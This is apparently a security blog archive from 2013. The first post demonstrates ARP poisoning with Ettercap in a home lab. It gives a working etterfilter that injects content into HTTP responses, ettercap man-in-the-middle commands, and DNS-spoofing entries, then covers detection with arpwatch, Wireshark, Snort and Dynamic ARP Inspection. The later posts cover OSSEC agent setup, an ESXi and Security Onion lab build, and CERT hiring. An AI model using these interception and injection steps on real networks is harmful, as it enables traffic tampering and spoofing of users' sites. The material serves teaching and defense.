14 May, 2013

More Ettercap and ARP Poisoning

My previous post about Ettercap gets a lot of hits, so I thought I should post a deeper look at some of the features with examples of usage. Before continuing, I'll point out a couple other good resources since some of my work is just building on that of others.

Irongeek has a couple good pages dealing with Ettercap.

There is plenty more information there if you search his site, plus a number of other sites and forums where you can find information.

I decided to show a couple examples, then relate them to NSM and ways to detect ARP poisoning. I happen to be using FreeBSD as the attacking system in this case, and a Windows 7 system as the targeted system. For my experiment, I'll use the following image.



Here is the filter I used to replace the page title and body with my own title and body. It includes segments from Irongeek's filter, so I'll include the GPL notice.

############################################################################
#                                                                          #
#  nr.filter -- filter source file                                         #
#  Based on work by Irongeek and others http://www.irongeek.com/           #
#                                                                          #   
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {  
   if (search(DATA.data, "Accept-Encoding")) {  
    replace("Accept-Encoding", "Accept-Rubbish!");   
      # note: replacement string is same length as original string  
    msg("zapped Accept-Encoding!\n");  
   }  
   if (search(DATA.data, "gzip")) {  
    replace("gzip", "  ");  
    msg("whited out gzip!\n");  
   }  
 }  
 if (ip.proto == TCP && tcp.src == 80) {  
   replace("<title>", "<title>PWNED<\/tITle><bodY><p><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg"></p></boDY>");  
   replace("<TITLE>", "<title>PWNED<\/tITle><bodY><p><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg"></p></boDY>");  
   replace("</title>", " ");  
   replace("</TITLE>", " ");  
   replace("<body>", " ");  
   replace("<BODY>", " ");  
   msg("Filter Ran.\n");  
 }  
This filter is designed to replace the "title" tag with a new title plus a body that links to the image. Then at the end of the filter, I attempt to replace the original page's title closing tag with a space since I already closed the tag, and then replace the original page's body tag with a space to eliminate the body of the page. I believe you could also use a pcre_regex command in the filter to more thoroughly remove the existing page body after inserting the image or other content of your choosing. See the etterfilter manual page for more.

To compile the filter, I simply execute the following:
$ etterfilter nr.filter -o nr.ef

Then to run ettercap on a FreeBSD VM in this example, I execute the following:
$ sudo ettercap -i em0 -F nr.ef -T -M arp:remote /172.16.126.2/ /172.16.126.131/

The "-T" option is to use the text interface rather than the GUI or ncurses. The "-M" executes a man-in-the-middle with the arguments for ARP poisoning that includes the gateway, which is the first IP address in this case. The second IP address is a Windows system.

Here are some examples of the results if trying to surf using Chrome on the targeted Windows 7 system.

Notice the title is not changed on Slashdot, indicating they do not use a traditional
HTML title tag. The body is also not replaced, just pushed down the page.
Here is what Google looks like.

Success.

Finally, here is my blog.

Success once again. Both the page title and body are replaced.
Another way to show how easy it is to redirect traffic to an unexpected site is with ettercap's DNS spoofing plugin. First, I edit /usr/local/share/ettercap/etter.dns and add the following lines.

facebook.com       A   216.34.181.45
*.facebook.com     A   216.34.181.45
www.facebook.com   PTR 216.34.181.45

google.com     A   131.253.33.200
*.google.com   A   131.253.33.200
www.google.com PTR 131.253.33.200

Then I run ettercap with the plugin enabled.
$ sudo ettercap -i em0 -P dns_spoof -T -M arp:remote /172.16.126.2/ /172.16.126.131/

This 20 second video shows what happens when I then try to go to Google or Facebook from the targeted system.


This can be fairly amusing, particularly if you are on a lab network where shenanigans are not only acceptable but expected. On the other hand, imagine injecting something more malicious than a funny image like a malicious iFrame or malicious Javascript. I played around with injecting Javascript into pages and it really is trivial if you're in a position to poison the network gateway. A good old-fashioned Rickroll is another good way to demonstrate the attack in a non-malicious way.

As I mentioned in a previous post about ettercap,  the Metasploit site was briefly owned through ARP poisoning in 2008. It is an old-school attack that can still be quite effective if you have access to a system on the same network segment as another system you want to attack.

Defenses against ARP poisoning are fairly simple to describe but not necessarily practical or easy to implement. The first, mentioned in the Metasploit article, is using static ARP tables so ARP requests over the network are no longer necessary. This may be simple in the case of a single gateway entry, but the larger the network the more administrative overhead to use static ARP entries.

You can also use software to detect ARP poisoning, for example LBNL's arpwatch. Any software that can show you MAC addresses along with IP addresses can potentially be used to detect poisoning since you would see the same IP address in use by multiple MAC addresses. For example, here is what my ARP poisoning with ettercap looks like in Wireshark.

You can see that the poisoner, 00:0c:29:6d:92:78, is associated with both IP addresses.
So, it is easy to see in the traffic but that doesn't mean it is necessarily easy to detect without some analyst intervention. Snort has an ARP spoofing preprocessor, but it seems likely that an IDS will often be in the wrong position on a network to see ARP traffic. In fact, most networks are probably not instrumented in such a way that you can see ARP traffic on a NSM sensor. It is not actually difficult in a technical sense, but it does require resources to have internal network sensors and make sure the network is architected properly for the sensors to have visibility. There are probably more efficient ways to allocate resources for detection in this case.

There are still other methods to help detect and prevent ARP spoofing, particularly with network equipment like managed switches. Jeremy Stretch has a good write-up on DHCP Snooping and Dynamic Arp Inspection over at his PacketLife blog showing exactly how DAI can be used to prevent and detect ARP poisoning. You can also read about DHCP Snooping and DAI on Cisco's site. This seems like it may be an easier method than IDS deployments since networking equipment is already positioned to see ARP traffic, but it does require equipment that supports ARP inspection.

I had originally thought of also showing how you could combine Ettercap with Metasploit to inject malicious traffic and more in the above examples, but I decided that would overly complicate this post. It is probably better reserved for a future post.

01 May, 2013

Installing OSSEC agent

With the recent news about the latest Apache backdoor on systems using cPanel, I thought it would be pertinent to show the process of adding an OSSEC agent that connects to a Security Onion server. Why is this relevant? Because OSSEC and other file integrity checkers can detect changes to binaries like Apache's httpd.

"OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response."
Many systems include integrity checking programs in their default installs these days, for instance Red Hat with AIDE. AIDE is also available in repositories for a number of other Linux distributions plus FreeBSD.

This case in particular would require using something other than the default options for integrity checking because cPanel installs Apache httpd in /usr/local/apache/bin, a non-standard directory that may not be automatically included when computing file hashes and doing subsequent integrity checks.

The reason I'm demonstrating OSSEC here is that it easily integrates with the Sguil console, and in Security Onion the sensors and server already have OSSEC configured to send alerts to Sguild. OSSEC also has additional functionality compared to AIDE. In this case, I'm installing the agent on a Slackware server.
$ wget http://www.ossec.net/files/ossec-hids-2.7.tar.gz

---snipped---

 $ openssl sha1 ossec-hids-2.7.tar.gz
SHA1(ossec-hids-2.7.tar.gz)= 721aa7649d5c1e37007b95a89e685af41a39da43
 $ tar xvzf ossec-hids-2.7.tar.gz

---snipped---

 $ sudo ./install.sh

  OSSEC HIDS v2.7 Installation Script - http://www.ossec.net

 You are about to start the installation process of the OSSEC HIDS.
 You must have a C compiler pre-installed in your system.
 If you have any questions or comments, please send an e-mail
 to dcid@ossec.net (or daniel.cid@gmail.com).

  - System: Linux webserver 3.8.4
  - User: root
  - Host: webserver
 
   -- Press ENTER to continue or Ctrl-C to abort. --

 
 1- What kind of installation do you want (server, agent, local, hybrid or help)? agent
 
  - Agent(client) installation chosen.

 2- Setting up the installation environment.

  - Choose where to install the OSSEC HIDS [/var/ossec]:
 
 3- Configuring the OSSEC HIDS.

   3.1- What's the IP Address or hostname of the OSSEC HIDS server?: 192.168.1.20
 
  - Adding Server IP 192.168.1.20

   3.2- Do you want to run the integrity check daemon? (y/n) [y]:

    - Running syscheck (integrity check daemon).

   3.3- Do you want to run the rootkit detection engine? (y/n) [y]:
 
 - Running rootcheck (rootkit detection).

   3.4 - Do you want to enable active response? (y/n) [y]:

3.5- Setting the configuration to analyze the following logs:
    -- /var/log/messages
    -- /var/log/auth.log
    -- /var/log/syslog
    -- /var/adm/syslog
    -- /var/adm/auth.log
    -- /var/adm/messages
    -- /var/log/xferlog
    -- /var/log/proftpd.log
    -- /var/log/apache/error_log (apache log)
    -- /var/log/apache/access_log (apache log)
    -- /var/log/httpd/error_log (apache log)
    -- /var/log/httpd/access_log (apache log)

  - If you want to monitor any other file, just change
   the ossec.conf and add a new localfile entry.
   Any questions about the configuration can be answered
   by visiting us online at http://www.ossec.net .

   --- Press ENTER to continue ---

---snip---

- Init script modified to start OSSEC HIDS during boot.
 - Configuration finished properly.
 - To start OSSEC HIDS:
                /var/ossec/bin/ossec-control start
 - To stop OSSEC HIDS:
                /var/ossec/bin/ossec-control stop
 - The configuration can be viewed or modified at /var/ossec/etc/ossec.conf

    Thanks for using the OSSEC HIDS.
    If you have any question, suggestion or if you find any bug,
    contact us at contact@ossec.net or using our public maillist at

    ossec-list@ossec.net
    ( http://www.ossec.net/main/support/ ).

    More information can be found at http://www.ossec.net

    ---  Press ENTER to finish (maybe more information below). ---

 - You first need to add this agent to the server so they 
   can communicate with each other. When you have done so,
   you can run the 'manage_agents' tool to import the 
   authentication key from the server.

   /var/ossec/bin/manage_agents

   More information at: 
   http://www.ossec.net/en/manual.html#ma

Next, I add the agent to my Security Onion server.
$ sudo /var/ossec/bin/manage_agents 

****************************************
* OSSEC HIDS v2.6 Agent manager.     *
* The following options are available: *
****************************************

   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).
   (Q)uit.

Choose your action: A,E,L,R or Q: A

- Adding a new agent (use '\q' to return to the main menu).

  Please provide the following:
   * A name for the new agent: webserver
   * The IP Address of the new agent: 192.168.1.5
   * An ID for the new agent[001]: 

Agent information:

   ID:001
   Name:webserver
   IP Address:192.168.1.5

Confirm adding it?(y/n): y

****************************************
* OSSEC HIDS v2.6 Agent manager.     *
* The following options are available: *
****************************************

   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).
   (Q)uit.

Choose your action: A,E,L,R or Q: e

Available agents: 

   ID: 001, Name: webserver, IP: 192.168.1.5

Provide the ID of the agent to extract the key (or '\q' to quit): 001

Agent key information for '001' is: 

---snip---

** Press ENTER to return to the main menu.

Now copy the key, go back to the web server, paste and import the key.
$ sudo /var/ossec/bin/manage_agents 

****************************************
* OSSEC HIDS v2.7 Agent manager.     *
* The following options are available: *
****************************************

   (I)mport key from the server (I).
   (Q)uit.

Choose your action: I or Q: i

* Provide the Key generated by the server.
* The best approach is to cut and paste it.
*** OBS: Do not include spaces or new lines.

Paste it here (or '\q' to quit): ---snip---

Agent information:
   ID:001
   Name:webserver
   IP Address:192.168.1.5

Confirm adding it?(y/n): y

If I was running a system with cPanel that was vulnerable to Cdorked.A then I would want to make sure OSSEC is monitoring the directories with the Apache httpd files. The OSSEC default configuration from my recent install is /var/ossec/etc/ossec.conf and the relevant lines are below:
<syscheck>
    <!-- Frequency that syscheck is executed - default to every 22 hours -->
    <frequency>79200</frequency>
    
    <!-- Directories to check  (perform all possible verifications) -->
    <directories check_all="yes">/etc,/usr/bin,/usr/sbin</directories>
    <directories check_all="yes">/bin,/sbin</directories>

So by default OSSEC would apparently not be checking the integrity of cPanel's Apache installation and I would need to add /usr/local/apache to the directory checks. After making any changes for my particular system, I check the status of OSSEC and it is not yet running.
$ sudo /etc/rc.d/rc.ossec status
ossec-logcollector not running...
ossec-syscheckd not running...
ossec-agentd not running...
ossec-execd not running...
$ sudo /etc/rc.d/rc.ossec start 
Starting OSSEC HIDS v2.7 (by Trend Micro Inc.)...
Started ossec-execd...
Started ossec-agentd...
Started ossec-logcollector...
Started ossec-syscheckd...
Completed.

Note after adding the OSSEC agent on the remote system then adding it on the OSSEC server, you must restart ossec-hids-server in order for the ossec-remoted process to start listening on 1514/udp for remote agents.
$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted not running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
$ sudo /etc/init.d/ossec-hids-server restart
Killing ossec-monitord .. 
Killing ossec-logcollector .. 
ossec-remoted not running ..
Killing ossec-syscheckd .. 
Killing ossec-analysisd .. 
ossec-maild not running ..
Killing ossec-execd .. 
OSSEC HIDS v2.6 Stopped
Starting OSSEC HIDS v2.6 (by Trend Micro Inc.)...
OSSEC analysisd: Testing rules failed. Configuration error. Exiting.
2013/04/30 23:13:59 ossec-maild: INFO: E-Mail notification disabled. Clean Exit.
Started ossec-maild...
Started ossec-execd...
Started ossec-analysisd...
Started ossec-logcollector...
Started ossec-remoted...
Started ossec-syscheckd...
Started ossec-monitord...
Completed.

$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted is running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...

$ netstat -l | grep 1514
udp        0      0 *:1514                  *:*    

Note the error corresponding to the FAQ entry about getting an error when starting OSSEC. However, since I'm running OSSEC 2.7 this did not seem to apply. Poking around, I realized the ossec-logtest executable had not been copied to /var/ossec/bin when I ran the install script. After I manually copied it to the directory, restarting OSSEC no longer caused the "Testing rules failed" error.

Once you have installed OSSEC on the system to be monitored, added the agent on the server, imported the key on the system to be monitored, restarted the server process, and started the client process, you will start getting alerts from the newly added system in Sguil. For example, the content of Sguil alerts will look like this after updating gcc:
Integrity checksum changed for: '/usr/bin/gcc'
Old md5sum was: '764a405824275d806ab5c441516b2d79'
New md5sum is : '6ab74628cd8a0cdf84bb3329333d936e'
Old sha1sum was: '230a4c09010f9527f2b3d6e25968d5c7c735eb4e'
New sha1sum is : 'b931ceb76570a9ac26f86c12168b109becee038b'

In the Sguil console, if I wanted to view all the recent OSSEC alerts I could perform a query as pictured below. Note you need to escape the brackets or remove them in favor of the MySQL wildcards '%%'.


Finally, to show an example of the various types of alerting that OSSEC can do in addition to checksum changes, here is a query and output directly from the MySQL console.
mysql> SELECT count(signature),signature FROM event WHERE signature LIKE '%%OSSEC%%' GROUP BY signature ORDER BY count(signature) DESC;
+------------------+---------------------------------------------------------------------------------------+
| count(signature) | signature                                                                             |
+------------------+---------------------------------------------------------------------------------------+
|              388 | [OSSEC] Integrity checksum changed.                                                   |
|              149 | [OSSEC] Host-based anomaly detection event (rootcheck).                               |
|               46 | [OSSEC] Integrity checksum changed again (2nd time).                                  |
|               39 | [OSSEC] IP Address black-listed by anti-spam (blocked).                               |
|               12 | [OSSEC] Integrity checksum changed again (3rd time).                                  |
|                4 | [OSSEC] Web server 400 error code.                                                    |
|                3 | [OSSEC] Receipent address must contain FQDN (504: Command parameter not implemented). |
+------------------+---------------------------------------------------------------------------------------+
7 rows in set (0.00 sec)
The highest count alert, plus the alerts indicating "2nd time" and "3rd time", are the basic functionality needed to detect changes to a file, my original use case. The "rootcheck" is alerting on files owned by root but writable by everyone. The balance of the alerts are from reading the system logs and detecting the system rejecting emails (anti-spam, 504) or web server error codes.

Back to the original problem of Cdorked.A, the blog posts on the subject also indicate that NSM could detect unusually long HTTP sessions, and there are no doubt other network behaviors that could be used to create signatures or network analytics resulting in detection. File integrity checks are just one possible way to detect a compromised server. Remember you need to have known good checksums for this to work! You ideally install something like OSSEC prior to the system being live on the network or at the least prior to it running any listening services that could be compromised before computing the checksums.

22 April, 2013

Home Lab Part 2: VMware ESXi, Security Onion, and More

As I stated in my previous post about a new home lab configuration, I decided to try VMware ESXi 5.1 on my new Shuttle SH67H. ESXi is free for uses like this, presumably because it clearly benefits VMware if professionals can use it in a lab setting and that encourages use of their paid products in production. I have seen some conflicting accounts, but it appears that the main limit on the free version of ESXi 5.1 is 32GB of RAM.

I won't go into too much detail about the installation since it is adequately covered by a couple of other posts I found prior to purchasing my system.

I will mainly cover details that stood out and things I discovered as someone new to ESXi.

I had already planned to get a Shuttle for the small form factor, low noise, and low power usage. Finding out that the SH67H could be used as a white box for ESXi made it easy to pick an initial project once I built the system. (Okay, we could quibble over whether a Shuttle counts as a white box). Additionally, since my previous home network sensor running Sguil had died, I figured that the first VM to build would be Security Onion but that I'd still be able to run multiple other VMs without impacting my home lab NSM.

Getting ESXi installed on the Shuttle was pretty simple. After booting to CD, I just followed the prompts and made sane choices. The one thing to note is that I installed ESXi to an external USB flash drive. Since the OS is so small, it gets loaded primarily to RAM at boot anyway. Using a flash drive has some advantages and some disadvantages, as shown in many discussions on the VMware and other discussion boards. For my home lab I decided to install to the flash drive, but chances are that it will actually make no difference to me. Some ESXi servers have no local storage, so I imagine it is particularly common for those systems to use a USB flash drive.

After using directly connected keyboard and monitor, I moved the system into my home "server closet" and booted it headless. I installed the vSphere Client on my local Windows VM since I don't have a non-VM Windows installation. The vSphere Client was surprisingly easy and I might even go as far as user-friendly. You can see in the screenshot below that it is relatively straightforward.
The error states "System logs on host vmshuttle are stored on non-persistent storage."
The first thing I noticed was, because of installing ESXi to the flash drive, I got the error shown in my screenshot.

This error was only temporary. I am not sure when it was resolved, most likely after a reboot or I created the initial guest VM, but the system created a ".locker" directory in which I can clearly see all the logs. I am assuming they are persistent since vmstore0 is the internal 1TB hard drive, not the USB flash drive.

# cd /vmfs/volumes/vmstore0/
# ls -l .locker/
drwxr-xr-x    1 root     root           280 Apr  7 16:01 core
drwxr-xr-x    1 root     root           280 Apr  7 16:01 downloads
drwxr-xr-x    1 root     root          4340 Apr 16 02:15 log
drwxr-xr-x    1 root     root           420 Apr  7 16:01 var


I believe another option for fixing the error would be to manually set the scratch partition as detailed in VMware's Knowledge Base. Note that I haven't actually tried that to date.

Before being able to SSH into the ESXi host and look at the above directories and files, I had to enable SSH. The configuration for SSH and a number of other security-related services is available in vSphere by highlighting the host (since in the workplace you may use vSphere to manage multiple ESXi systems), then going to the Configuration tab, Security Profile, and finally SSH Properties. If you haven't noticed already, ESXi defaults to using root for everything. I haven't yet investigated the feasibility of locking down the ESXi host, but I think it's safe to say most people will rely on keeping the host as isolated as possible since the host OS is not particularly flexible or configurable outside options VMware provides.

I decided the best way to use vSphere would be to copy my Windows 7 VM from my laptop to the ESXi host. Trying to scp the VM then adding it to the inventory never worked properly. I had similar problems when trying to scp a CentOS VM from my laptop. When I tried browsing the datastore in vSphere and adding a local machine to the remote inventory, it would get partway through and then fail with an I/O error. I believe this was all actually a case of a flaky wireless access point, but even in cases where I successfully copied the CentOS VM I got errors when trying to add it to the inventory.

I eventually got it to work by converting the VM locally using ovftool then deploying it to ESXi. OVF is the Open Virtualization Format, an open standard for packaging virtual machines. The syntax to convert an existing VM is simple. First, make sure the VM is powered down rather than just paused. On OSX running VMware Fusion, you can export a VM easily.

~ nr$ cd  /Applications/VMware\ Fusion.app/Contents/Library/VMware\ OVF\ Tool/ovftool
~ nr$ ./ovftool -dm=thin ~/Documents/Virtual\ Machines.localized/Windows\ 7\ x64.vmwarevm/Windows\ 7\ x64.vmx ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf

After the conversion, the VM still needed to be exported to the ESXi host. I plugged my laptop into a wired connection to speed the process and eliminate any issues I was having over wireless, then sent the VM to ESXi. The options I used are to set the datastore, disk mode, and network.

~ nr$ ./ovftool -ds=vmstore0 -dm=thin --network="VM Network 2" ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf vi://192.168.1.10/

Once the VM is copied to the host, you will need to browse the datastore and add the VM to the ESXi inventory. Other ways to move a VM to ESXi are not endorsed by VMware. They officially recommend using OVF to import VMs.

All things considered, getting ESXi installed and configured was relatively easy. There are certainly drawbacks to using unsupported hardware. For example, vSphere does not display CPU temperature and other health or status information. I believe ESXi expects to use IPMI for hardware status like voltages, temperatures, and more. There are options to consider for anyone wanting a home lab using supported hardware. VMware maintains a lengthy HCL and I presume systems on their list support all the health status information in vSphere. I did find several possibilities to buy used servers like a Dell PowerEdge 2950 at reputable sites for about $650. Since I didn't want the noise, don't have a rack, and may not keep the system as a dedicated ESXi host, I did not go that route for a lab system.

Building a Security Onion VM


As stated, the first VM I built was Security Onion. I did this through the vSphere client and include some screenshots here. Most of this applies to building any VM using vSphere.

After choosing the option to create a new VM, I selected a custom configuration. I named the VM simply "Security Onion" and chose my only datastore, vmstore0, as the storage location. I am not concerned with backwards compatibility, so chose "Virtual Machine Version 8." I chose only one core and one socket for the CPU, but allocated 4GB of RAM since I knew the combination of Suricata, Bro, and other monitoring processes would eat a lot of RAM. I was installing 64-bit, so I chose 64-bit Ubuntu as the Linux version. 
Choosing the number of NICs, network, and
adapter to use when initially configuring the VM
I selected two NICs both using VMXNET 3, which was probably the first non-standard selection in my custom configuration. I wanted to make sure I had separate management and promiscuous mode NICs since this will be a sensor. The option for VMXNET 3 should not be available as a choice if you previously selected an OS that doesn't support it when you created the VM.

I next chose the LSI Logic SAS for the SCSI Controller. Although I think it won't matter for Ubuntu, note the following from VMware's local help files.
"The LSI Logic Parallel adapter and the LSI Logic SAS adapter offer equivalent performance. Some guest operating system vendors are phasing our support for parallel SCSI in favor of SAS, so if your virtual machine and guest operating system support SAS, choose LSI SAS to maintain future compatibility."
This is a good time to point out that hitting the "Help" button in vSphere will open the local help files in your browser, and they contain actual useful information about the differences in choices when configuring the VM. In the case of the help button during the process of creating a new VM, it will actually open the specific page that is contextually useful for the options on the current step of the process. In general, both their help files and the Knowledge Base seem quite useful.

Finally, I created the virtual disk. This includes deciding whether to thin provision, thick provision lazy zeroed, or thick provision eager zeroed, meaning prepare the disk ahead of time. The documentation states that eager zeroed supports clustering for fault tolerance. I chose thick provisioned for my Security Onion since I knew with certainty that the virtual disk would get filled with NSM data like packet captures and logs. There are a number of KB and blog posts on the VMware site that detail advantages and disadvantages of the different provisioning methods.
The final settings for my Security Onion VM

Once the VM was configured on ESXi, I still needed to actually install Security Onion. You can do it the old-fashioned way by burning a disc and using the CD/DVD drive, but I used mounted the ISO. To do this, you just need to start the VM, which doesn't yet have an OS, then open a console in vSphere and click the button to mount the ISO in the virtual CD drive so it will boot to the disc image and start the installation process. The vSphere console is a similar view and interface to Fusion or Workstation and mounting the ISO works essentially the same way.

The time it took from hitting the button to create a VM to the time I had a running Security Onion sensor was quite short. I had a couple small problems after the initial installation. First, in ESXi you have to manually go to the NIC settings and check a box that allows it to sniff all the traffic. My sniffing interface was initially not seeing the traffic when I checked with tcpdump, which made me realize it was probably not yet in promiscuous mode.

Second, the 4GB RAM and one CPU I had initially allocated was insufficient. When the sensor was running and I tried to update Ubuntu, the system became very unresponsive. I eventually doubled the RAM to 8GB and the number of cores to two, which resolved the issue. I think at this point that I could probably actually drop back down to 4GB of RAM, but since the system has 32GB I don't need to worry about it yet.

Other ESXi Notes


Although ESXi is stripped pretty bare of common Linux utilities and commands, there is plenty you can do from a command line through SSH instead of using vSphere. For example, to list all VMs on the system, power on my Windows 7 VM, and find the IP address so I can connect through RDP:

# vim-cmd vmsvc/getallvms
Vmid        Name                            File                           Guest OS       Version   Annotation
1      Security Onion   [vmstore0] Security Onion/Security Onion.vmx   ubuntu64Guest      vmx-08              
13     Windows 7 x64    [vmstore0] Windows 7 x64/Windows 7 x64.vmx     windows7_64Guest   vmx-09              
6      CentOS 64-bit    [vmstore0] CentOS 64-bit/CentOS 64-bit.vmx     centos64Guest      vmx-08 
~ # vim-cmd vmsvc/power.on 13
~ # vim-cmd vmsvc/get.guest 13 | grep -m 1 ipAddress
   ipAddress = "192.168.1.160",

I can get smartd information from my hard drive if needed.

~ # esxcli storage core device list
t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF
   Display Name: Local ATA Disk (t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF)
   Has Settable Display Name: true
   Size: 953869
   Device Type: Direct-Access 
   Multipath Plugin: NMP
   Devfs Path: /vmfs/devices/disks/t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF
   Vendor: ATA     
   Model: ST1000DM003-1CH1
   Revision: CC44
   SCSI Level: 5
   Is Pseudo: false
   Status: on
   Is RDM Capable: false
   Is Local: true
   Is Removable: false
   Is SSD: false
   Is Offline: false
   Is Perennially Reserved: false
   Queue Full Sample Size: 0
   Queue Full Threshold: 0
   Thin Provisioning Status: unknown
   Attached Filters: 
   VAAI Status: unknown
   Other UIDs: vml.01000000002020202020202020202020205a31443347484b46535431303030
   Is Local SAS Device: false
   Is Boot USB Device: false

~ # esxcli storage core device smart get -d t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF
Parameter                     Value  Threshold  Worst
----------------------------  -----  ---------  -----
Health Status                 OK     N/A        N/A  
Media Wearout Indicator       N/A    N/A        N/A  
Write Error Count             N/A    N/A        N/A  
Read Error Count              115    6          99   
Power-on Hours                100    0          100  
Power Cycle Count             100    20         100  
Reallocated Sector Count      100    10         100  
Raw Read Error Rate           115    6          99   
Drive Temperature             32     0          40   
Driver Rated Max Temperature  68     45         65   
Write Sectors TOT Count       200    0          200  
Read Sectors TOT Count        N/A    N/A        N/A  
Initial Bad Block Count       100    99         100  

There is a lot more you can do from the ESXi command line interface, but I should emphasize again that it is stripped fairly bare and does not have a lot of commands you expect if you come from a Linux or Unix background. Even some of the utilities that are available do not have some of the options or functionality you would expect. The CLI commands will generally list options or help when run without arguments. You can also get plenty of CLI documentation from VMware.


Next Steps


I now have a number of VMs installed, including a CentOS snapshot, FreeBSD, and my Windows 7 VM. My next steps will include setting up some VLANs to have some fun with a vulnerable network and an attacker network that will include KaliLinux. I am intimately familiar with Sguil and some of the other tools in Security Onion, but also hope to dig into Suricata and Bro more than I have in the past.

I also hope that my lab will provide some interesting material for future blog posts.

04 April, 2013

New Home Lab Configuration

I received all my new equipment for my home lab a couple of days ago. After setting up the hardware in less than a day, I'm quite happy with it so far.

I was lucky enough to have two 12-year-olds assist me when I assembled the computer. This was their first time assembling a computer from parts and they really enjoyed it.

The first component was the Shuttle SH67H3. My friend Richard recommended the DS61, but I had two main problems with that barebones system. First, it only has two RAM slots for a maximum of 16GB. That's not bad, but I decided I wanted to get a desktop that supported more RAM without going to server components while keeping the form factor small. I actually may have a second system on my purchase list for sometime this year, and in that case I would definitely consider the DS61.

Second, I had read that the SH67H3 worked as an ESXi whitebox. Overall, I am a fan of Shuttle barebones. The SH67H3 is essentially the same chassis my coworkers and I used on our lab network at a previous job, just with a new motherboard and other improvements. I used very similar or identical parts for my Shuttle as the ones listed in the ESXi whitebox link above.

When we popped the case open, it all looked pretty familiar and I explained the various pieces to the 12-year-olds. We removed the fan and heat sink array, which is a pretty nice low-noise setup. The case fan actually slides over the second heat sink so air blows over it on the way out the back of the chassis.
Don't forget to remove both the sticker from the heatsink and the plastic film that is on the CPU load plate before putting the CPU in the socket. After we inserted the Intel Core i7 2600, we applied thermal paste, reattached the passive cooling, and finally reattached the fan including plugging it back into the motherboard. We also inserted the four 8GB RAM sticks.
Shuttle SH76H3 motherboard with CPU and RAM installed
The fan slides over the heat sink at the rear of the chassis on the left
Next, we put the DVD/CD drive and hard drive into the tray, attached the tray to the chassis, and connected the SATA and power cables. I also added a dual Intel PRO/1000 PT NIC to give a total of three physical network interfaces. We finally tested and everything appeared to be working.


New Network Architecture


Going to all this trouble for a relatively powerful computer compared to my three old Pentium III servers, I decided to take the opportunity to make a couple of other network changes. I used to run my network sensor inline, but along with the new computer I purchased a Netgear GS108T-200 smart switch. This switch has an abundance of features, including VLANs and port mirroring. Along with the new switch, all I needed was an extra WAP to reconfigure home network as shown below.
The router/firewall also works as a WAP, but to see most client traffic
I disabled it and connected an access point behind the mirroring switch
With this configuration, the switch will mirror traffic to a dedicated network interface on my network sensor. Only traffic that doesn't make it to the switch will not be seen on the mirror port. I can also configure VLANs on the switch if I want to segment the network based on functions like management interfaces and WiFi clients.

I plan to write more about my lab setup as I continue to redevelop it. The first thing I did after testing the new box was install ESXi and create a network sensor VM using Security Onion. I may have a post about it soon.

29 March, 2013

CERT is hiring

The company I work for is hiring. For those that don't know, CERT is part of the Software Engineering Institute at Carnegie Mellon University. CERT was created in 1988 as part of the response to the Morris worm. You can find out more on CERT's "About Us" page.

If you are interested, please read more about our hiring process and browse some of the available positions. The positions are primarily in Pittsburgh with a few openings in Arlington, VA. The open positions cover network security analysis, security architecture, malware analysis, software development, vulnerability analysis, and more.

I consider our hiring process fairly grueling but also stimulating. It gives the prospective employee and prospective coworkers a good chance to really learn if the relationship will work. It is an opportunity not just for the candidate to get interviewed, but also for the candidate to interview those that already work at CERT.

One of the reasons we have so many vacant positions is because we try to maintain high standards when considering candidates. Most of our positions require a fair amount of experience and expertise. My colleagues are smart, diligent, and largely enthusiastic about their chosen professions. Don't get me wrong -- we still have bad days when we are less enthusiastic or unhappy about the state of information security, but this is a pretty cool place to work. We do a wide variety of both research and more operationally focused work, tackling a lot of big problems. We also get a fair amount of freedom to find interesting and challenging areas of work.

If I know you or know of your work, please contact me about using my name as a referral. A referral from a current CERT employee can be helpful when applying. The best way to contact me regarding a referral or to ask other questions is via email or LinkedIn. You can also post questions more publicly here on my blog if it seems appropriate. In the interest of disclosure, I have an interest in recruiting people that I will want to work with but also could potentially get a referral bonus if you list me when you apply.

11 March, 2013

Building an IR Team: Growth

This is a long overdue continuation of my posts regarding Building an Incident Response Team. I had a very rough outline of this post going all the way back to 2009! The good response I got on some of my previous posts on building IR teams made me come back and work on finishing the posts I had planned when I first started the series.

Previous posts:

I believe one of the hardest things to deal with when building a successful IR team is growth. If you build an IR team that is successful and gets management buy-in as a result, there is a good chance that responsibilities, the amount of work, the number of incidents detected, and the size of the team will all grow. This will invariably cause growing pains, setbacks, and reevaluation of procedures.

